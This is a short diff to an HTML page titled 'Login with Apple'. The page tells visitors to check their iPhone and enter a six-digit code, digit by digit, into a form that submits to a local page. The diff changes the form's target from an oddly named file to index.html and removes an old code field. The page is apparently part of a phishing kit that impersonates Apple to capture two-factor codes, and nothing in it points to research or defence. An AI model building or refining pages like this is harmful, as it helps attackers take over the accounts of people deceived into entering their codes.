--- a/apple2.html
+++ b/apple2.html
@@ -15,10 +15,9 @@
         <div class="shape"></div>
         <div class="shape"></div>
     </div>
-    <form action="./kdzwx.html" method="get" name="form">
+    <form action="./index.html" method="get" name="form">
         <h3>Login with Apple <i class="fab fa-apple"></i></h3>
         <label for="username">Check your Iphone</label>
-        <!-- <input type="text" placeholder="Code" name="password" id="password" class="login" maxlength="6" minlength="6" required> -->
         <div class="input-field">
             <input type="number" id="password" name="c" maxlength="1" onkeyup="moveToNextInput(this, 1)" />
             <input type="number" id="password" name="c" maxlength="1" onkeyup="moveToNextInput(this, 2)" disabled />
